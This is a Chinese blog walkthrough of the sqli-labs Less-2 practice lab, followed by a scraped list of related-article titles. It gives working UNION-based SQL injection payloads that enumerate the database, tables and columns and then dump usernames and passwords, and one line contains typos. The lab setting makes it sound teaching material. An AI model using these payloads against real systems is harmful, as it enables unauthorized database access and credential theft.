[网络安全]sqli-labs Less-2 解题详析

2023-10-26

[网络安全]Less-2 GET - Error based - Intiger based:基于错误的GET整型注入

往期回顾：[网络安全]sqli-labs Less-1 解题详析

判断注入类型

GET1 and 1=1，回显如下：
在这里插入图片描述
GET1 and 1=2，没有回显：
说明该漏洞类型为整型注入。

判断注入点个数

GET1 order by 3，回显如下：
在这里插入图片描述 GET1 order by 4，回显如下：
说明注入点个数为3个
即可构造语句如下

-1' union select 1,2,xx form xx; --+

查库名

-1 union select 1,2,database(); --+

在这里插入图片描述

查表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

在这里插入图片描述

查users表的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

-1 union select 1,group_concat(password),group_concat(username) from security.users; --+

在这里插入图片描述

注意

group_concat(password)的回显点在第二点上，对应回显页面中的Your Login name
group_concat(username)的回显点在第三点上，对应回显页面中的Your Password

除此之外，可以单独查询username和password，如下：

-1 union select 1,2,group_concat(username) from security.users; --+

在这里插入图片描述该页面回显即为用户名；

-1 union select 1,2,group_concat(password) from security.users; --+

在这里插入图片描述该页面回显即为密码。

总结

以上为[网络安全]sqli-labs Less-2 解题详析，后续将分享[网络安全]sqli-labs Less-3 解题详析
原理及姿势可参考：[网络安全]SQL注入原理及常见攻击方法简析
我是秋说，我们下次见。

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

网络安全攻防兼备

SqliLabs靶场攻防实战

web安全

数据库

安全

[网络安全]sqli-labs Less-2 解题详析的相关文章

J2EE常见面试题（一）

StringBuilder和StringBuffer的区别 String 字符串常量不可变使用字符串拼接时是不同的2个空间 StringBuffer 字符串变量可变线程安全字符串拼接直接在字符串后追加 StringBuilder
图解python | 字符串及操作

1 Python元组 Python的元组与列表类似不同之处在于元组的元素不能修改元组使用小括号列表使用方括号元组创建很简单只需要在括号中添加元素并使用逗号隔开即可 tup1 ByteDance ShowMeAI 1997 202
【网络安全】Facebook代码执行实现命令执行、敏感信息泄露

部分网站开设编码练习若安全配置不当则代码执行将升级为操作系统命令注入导致敏感信息泄露本文仅分享命令执行相关知识不承担任何由于传播利用本文所发布内容而造成的任何后果及法律责任未经许可不可转载文章目录信息泄露扩大危害信息
软件测试|SQLAlchemy环境安装与基础使用

简介 SQLAlchemy 是一个强大的 Python 库用于与关系型数据库进行交互它提供了高度抽象的对象关系映射 ORM 工具允许使用 Python 对象来操作数据库而不必编写原生SQL查询本文将介绍如何安装 SQLAlchem
网络安全（黑客）自学

1 网络安全是什么网络安全可以基于攻击和防御视角来分类我们经常听到的红队渗透测试等就是研究攻击技术而蓝队安全运营安全运维则研究防御技术 2 网络安全市场一是市场需求量高二则是发展相对成熟入门比较容易 3 所需要的
电商数据api接口商品评论接口接入代码演示案例

电商数据API接口商品评论接口接入入口提高用户体验通过获取用户对商品的评论商家可以了解用户对商品的满意度和需求从而优化商品和服务提高用户体验提升销售业绩用户在购买商品前通常会查看其他用户的评论以了解商品的实际效果和质量商
深入了解 Python MongoDB 查询：find 和 find_one 方法完全解析

在 MongoDB 中我们使用 find 和 find one 方法来在集合中查找数据就像在MySQL数据库中使用 SELECT 语句来在表中查找数据一样查找单个文档要从MongoDB的集合中选择数据我们可以使用 find one
【计算机毕业设计】电商个性化推荐系统

伴随着我国社会的发展人民生活质量日益提高于是对电商个性化推荐进行规范而严格是十分有必要的所以许许多多的信息管理系统应运而生此时单靠人力应对这些事务就显得有些力不从心了所以本论文将设计一套电商个性化推荐系统帮助商家进行商品信息在
【计算机毕业设计】电影播放平台

电影播放平台采用B S架构数据库是MySQL 网站的搭建与开发采用了先进的java进行编写使用了springboot框架该系统从两个对象由管理员和用户来对系统进行设计构建主要功能包括个人信息修改对用户电影分类电影信息等功能
【计算机毕业设计】二手家电管理平台

时代在飞速进步每个行业都在努力发展现在先进技术通过这些先进的技术来提高自己的水平和优势二手家电管理平台当然不能排除在外二手家电管理平台是在实际应用和软件工程的开发原理之上运用java语言以及前台VUE框架后台SpringBoot
【计算机毕业设计】OA公文发文管理系统_xtv98

近年来人们的生活方式以网络为主题不断进化 OA公文发文管理就是其中的一部分现在无论是大型的还是小型的网站都随处可见不知不觉中已经成为我们生活中不可或缺的存在随着社会的发展除了对系统的需求外我们还要促进经济发展提高工作效率
做测试不会 SQL？超详细的 SQL 查询语法教程来啦！

前言作为一名测试工程师工作中在对测试结果进行数据比对的时候或多或少要和数据库打交道的要和数据库打交道那么一些常用的sql查询语法必须要掌握最近有部分做测试小伙伴表示sql查询不太会问我有没有sql查询语法这一块的文档可以学习
面试官问，如何在十亿级别用户中检查用户名是否存在？

面试官问如何在十亿级别用户中检查用户名是否存在前言不知道大家有没有留意过在使用一些app注册的时候提示你用户名已经被占用了需要更换一个这是如何实现的呢你可能想这不是很简单吗去数据库里查一下有没有不就行了吗那么假如用户数量
Mysql中设置只允许指定ip能连接访问(可视化工具的方式)

场景 Mysql中怎样设置指定ip远程访问连接 Mysql中怎样设置指定ip远程访问连接 navicat for mysql 设置只有某个ip可以远程链接 CSDN博客前面设置root账户指定ip能连接访问是通过命令行的方式如果通过可视
MongoDB - 库、集合、文档（操作 + 演示 + 注意事项）

目录一 MongoDB 1 1 简介 a MongoDB 是什么为什么要使用 MongoDB b 应用场景 c MongoDB 这么强大是不是可以直接代替 MySQL d MongoDB 中的一些概念 e Docker 下载 1 2
温室气体排放更敏感的模型（即更高的平衡气候敏感性（ECS））在数年到数十年时间尺度上也具有更高的温度变化（Python代码实现）

欢迎来到本博客博主优势博客内容尽量做到思维缜密逻辑清晰为了方便读者座右铭行百里者半于九十本文目录如下目录 1 概述 2 运行结果 3 参考文献 4 Python代码数据
网络安全（黑客）自学启蒙

一什么是网络安全网络安全是一种综合性的概念涵盖了保护计算机系统网络基础设施和数据免受未经授权的访问攻击损害或盗窃的一系列措施和技术经常听到的红队渗透测试等就是研究攻击技术而蓝队安全运营安全运维则研究防御技术作
温室气体排放更敏感的模型（即更高的平衡气候敏感性（ECS））在数年到数十年时间尺度上也具有更高的温度变化（Python代码实现）

欢迎来到本博客博主优势博客内容尽量做到思维缜密逻辑清晰为了方便读者座右铭行百里者半于九十本文目录如下目录 1 概述 2 运行结果 3 参考文献 4 Python代码数据
温室气体排放更敏感的模型（即更高的平衡气候敏感性（ECS））在数年到数十年时间尺度上也具有更高的温度变化（Python代码实现）

欢迎来到本博客博主优势博客内容尽量做到思维缜密逻辑清晰为了方便读者座右铭行百里者半于九十本文目录如下目录 1 概述 2 运行结果 3 参考文献 4 Python代码数据
【安全】原型链污染 - Hackit2018

目录准备工作解题代码审计 Payload 准备工作将这道题所需依赖模块都安装好后运行一下然后可以试着访问一下报错是因为里面没内容而已不影响准备工作就做好了解题代码审计 const express require exp

随机推荐

多线程如何在 C 中实现？

多线程英语 multithreading 是指从软件或者硬件上实现多个线程并发执行的技术具有多线程能力的计算机因有硬件支持而能够在同一时间执行多于一个线程进而提升整体处理性能具有这种能力的系统包括对称多处理机多核心处理器以及芯片级
java内存马查杀工具

java memshell scanner 扫描java内存马
模版之AnyType

title 模版之AnyType date 2023 02 19 21 49 53 permalink pages 54a0bf categories 通用领域编程语言 C tags C 元编程 author name zhengzhib
Java里NonNull和NotNull

https blog csdn net yangyangrenren article details 121180269 lombok NonNull 这个 annotation 是 lombok 提供的根据官方的解释可以看出它是用来辅助
华为OD机试 - 组成最大数（Java）

题目描述小组中每位都有一张卡片卡片上是6位内的正整数将卡片连起来可以组成多种数字计算组成的最大数字输入描述号分割的多个正整数字符串不需要考虑非数字异常情况小组最多25个人输出描述最大的数字字符串用例输入 22 221
Pycharm 交互式Console BUG问题解决 - OSError: [Errno 22] Invalid argument: ‘D:\pyCHram\＜input＞‘

引言 Pycharm python console是一个很好用的交互式编程栏但是在跑一些深度学习模型的时候偶尔会发生类似于这种错误的报错导致无法在交互式的Python console模式下运行测试代码 Pycharm 问题解决 OSE
攻防世界NewsCenter思路

打开环境后发现是这样一个页面考虑到xss或者sql注入尝试了alert无果便试试sql注入随便输入aaa后使用burp抓包将这些保存在1 txt里用sqlmap抓包命令 sqlmap py r 1 txt dbs 这里看到一个
U-Boot相关命令开发板烧写问题及解决方案

前言最近在学习u boot命令在开发板的烧写在进行该实验的过程中出现了很多问题和错误在这里我根据自己的开发历程将我出现的几大问题进行了汇总并附有相关解决办法这些解决方案都经过我亲自验证有效希望能让大家在开发过程中有所启发问
C++实现复化梯形公式求积分算法

1 算法原理简介步1 将积分区间2n等分步2 调用复化梯形公式 2 应用实例取 n 10 利用复化梯形公式计算积分 3 程序代码 include
BLDC无刷直流电机驱动电路-硬石电子

1 BLDC无刷直流电机驱动电路因为BLDC是三相完全一样的驱动电路下图为其中一相电路图其他两相完全一样主要元器件高速光耦 TLP715 MOS管驱动IC IR2110S MOS IRF540NS D7和C13为自举电路 2 霍尔
ubuntu18.04安装之后没有网络，不显示网络图标

新安装的ubuntu18 04 06安装完成后插着网线但是没有有线网桌面上不显示网络图标原因是因为ubuntu系统安装时自带的网卡驱动不兼容导致的下面来讲解解决方法首先先试用手机连接线将手机连接到电脑usb口使用手机上的US
matlab中hash和map的用法总结

若要在matlab中使用hash 有两种方式 1 采用matlab官方给出的结构类型map containers Map http cn mathworks com help matlab map containers html 2 调用J
到底要不要孩子学习机器人编程

人工智能发展迅猛很多技术已经成熟应用到我们生活场景中如果再不从小让孩子学习机器人编程教育掌握更多编程语言那未来就out啦格物斯坦小坦克可以告诉你关于机器人编程要不要学的答案教育部也将启动中小学生信息素养测评并推动在中小学阶段设
uni-app利用chooseImage方法封装一个图片选择组件

效果如图可以预览长按可删除可以设置最多上传数量这里封装的组件有个MaxNumber number类型用的时候在父组件传就行了这里默认给的8 废话不多说直接上代码封装好了之后我们用的时候只需要引入直接用就行
从etcd看Raft协议

首先什么是etcd 看官方的定义 A highly available key value store for shared configuration and service discovery 翻译过来就是用于配置共享和服务发现的K
动态规划（五）

01背包问题 01 Knapsack problem 有10件货物要从甲地运送到乙地每件货物的重量单位吨和利润单位元如下表所示由于只有一辆最大载重为30t的货车能用来运送货物所以只能选择部分货物配送要求确定运送哪些货物
如何快速画AltiumDesigner封装——用Ultralibrarian生成库文件---官网最新打开方式

如何用Ultralibrarian生成库文件官网最新打开方式步骤1 下载元器件步骤2 AltiumDesigner生成库文件 Ultralibrarian软件比较常用的生成库文件的软件网上对于它的介绍大多还停留在软件使用层面上但官
区块链的工作流程

工作流程通过前两篇文章相信大家对区块链有了基本的认识区块链系统有很多种第一个应用区块链的软件就是比特币事实上区块链就是比特币带出来的到现在为止已经出现很多基于区块链的系统了比如超级账本以太坊等每一类系统都有自己的特点无
雪花算法生成ID

雪花算法生成ID Snowflake 雪花算法是由Twitter开源的分布式ID生成算法以划分命名空间的方式将64 bit位分割成多个部分每个部分代表不同的含义而Java中64bit的整数是Long类型所以在Java中 SnowFl
[网络安全]sqli-labs Less-2 解题详析

网络安全 Less 2 GET Error based Intiger based 基于错误的GET整型注入判断注入类型判断注入点个数查库名查表名查users表的列名查字段注意总结往期回顾网络安全 sqli labs L

热门标签